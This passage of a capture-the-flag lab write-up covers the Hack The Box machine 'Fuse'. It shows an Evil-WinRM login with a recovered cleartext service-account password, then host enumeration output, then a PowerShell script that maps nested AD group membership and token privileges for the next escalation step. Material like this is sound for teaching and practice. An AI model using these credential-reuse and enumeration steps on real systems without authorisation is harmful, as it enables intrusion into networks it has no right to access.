Evil-WinRM


The cleartext password recovered from one of the network printer's attributes belongs to the svc-print account. That account has an extensive transitive (nested) group membership, and one of those memberships is what allows it to PSRemote to the target system.

As discovered by Nmap earlier, a WinRM service is listening on the target's port 5985, so the credentials can be used directly with Evil-WinRM.

┌──(kali㉿kali)-[~/archive/htb/labs/fuse]
└─$ evil-winrm -i $IP -u 'fabricorp.local\svc-print' -p '$fab@s3Rv1ce$1'   
 
Evil-WinRM shell v3.4
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents> hostname
Fuse
*Evil-WinRM* PS C:\Users\svc-print\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::bb
   IPv6 Address. . . . . . . . . . . : dead:beef::786e:10c2:1173:5102
   Link-local IPv6 Address . . . . . : fe80::786e:10c2:1173:5102%5
   IPv4 Address. . . . . . . . . . . : 10.10.10.193
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
                                       10.10.10.2

Tunnel adapter isatap.{af2c7a34-a136-4854-894e-84f30da6c214}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

Initial foothold established on the target system as the svc-print user.
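The "extensive transitive group membership" that grants svc-print its WinRM access is worth confirming from inside the session rather than taking on faith, because the same nested groups decide what the next escalation step can be. The script below is an added example for that check; it is not part of the original writeup and not Evil-WinRM's own code. It assumes it is pasted into the Evil-WinRM session above (so it runs as the domain user svc-print) and that the domain controller is reachable over LDAP; the group names it flags are only the Windows defaults that grant PSRemoting, not a claim about which groups svc-print is actually in.

```powershell
# Added example (not from the original writeup): enumerate the transitive
# (nested) group membership of the current user from inside the Evil-WinRM
# session and flag the memberships that grant WinRM/PSRemoting by default.
# Assumptions: runs as a domain user (svc-print in this writeup) and the DC
# answers LDAP queries from this host.

# 1. Groups already flattened into the live access token by the OS.
$tokenGroups = [System.Security.Principal.WindowsIdentity]::GetCurrent().Groups |
    ForEach-Object {
        try   { $_.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $_.Value }   # keep the raw SID if it does not resolve
    }

# 2. Same view from Active Directory: the constructed tokenGroups attribute
#    lists every security group the account is transitively a member of,
#    which catches nesting that 'net user /domain' would hide.
$sam      = $env:USERNAME
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(&(objectCategory=person)(sAMAccountName=$sam))"
$searcher.PropertiesToLoad.Add('distinguishedName') | Out-Null
$userEntry = $searcher.FindOne().GetDirectoryEntry()
$userEntry.RefreshCache(@('tokenGroups'))

$adGroups = foreach ($sidBytes in $userEntry.Properties['tokenGroups']) {
    $sid = New-Object System.Security.Principal.SecurityIdentifier($sidBytes, 0)
    try   { $sid.Translate([System.Security.Principal.NTAccount]).Value }
    catch { $sid.Value }
}

# 3. Report. By default only these two groups may open a PSRemoting session;
#    anything else granting access would mean a customised WinRM ACL.
$remotingGroups = 'Remote Management Users', 'Administrators'

"== Transitive group membership of $sam (from AD tokenGroups) =="
$adGroups | Sort-Object -Unique | ForEach-Object {
    $shortName = ($_ -split '\\')[-1]
    if ($remotingGroups -contains $shortName) { "$_   <-- grants WinRM access by default" }
    else                                      { $_ }
}

# 4. Groups present in AD but missing from the token point at SID filtering
#    or a stale logon; groups in the token but not in AD are local to Fuse.
"== Groups in token but not listed by AD =="
$tokenGroups | Where-Object { $adGroups -notcontains $_ }

# 5. Nested membership also carries privileges; dump them for the next step.
"== Token privileges =="
whoami /priv
```

Run it from the `*Evil-WinRM* PS` prompt after landing. Step 2 is the important one: a user can reach WinRM through a chain of nested groups that `whoami /groups` shows only as the final flattened result, whereas `tokenGroups` comes straight from the directory and can be compared against the token to spot discrepancies.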